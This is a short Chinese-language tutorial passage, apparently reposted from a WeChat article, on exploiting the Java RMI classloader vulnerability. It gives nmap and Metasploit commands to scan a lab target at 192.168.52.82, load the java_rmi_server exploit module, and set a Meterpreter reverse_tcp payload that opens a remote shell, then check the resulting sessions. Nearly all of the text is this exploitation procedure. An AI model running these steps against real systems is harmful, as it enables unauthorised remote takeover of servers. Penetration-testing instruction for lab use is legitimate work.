还可以使用nmap进行漏洞探测:
nmap --script=rmi-vuln-classloader ip -p port
对漏洞的探测,Metasploitable也具备扫描模块。先查找java rmi漏洞扫描模块。
search java_rmi
使用监听模块。
use auxiliary/scanner/misc/java_rmi_server
配置好目标ip,执行,可以查看到漏洞存在。
set rhosts 192.168.52.82
run
接着切换漏洞利用模块。
use exploit/multi/misc/java_rmi_server
除了设置好目标RHOSTS外,还需要设置监听模块。
Set payload /java/meterpreter/reverse_tcp
执行成功。执行多次,建立的sessions通过exp打完后都会断掉。这时候需要查看sessions。
查看sessions。
原文始发于微信公众号(Enginge):JAVA RMI的漏洞利用
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论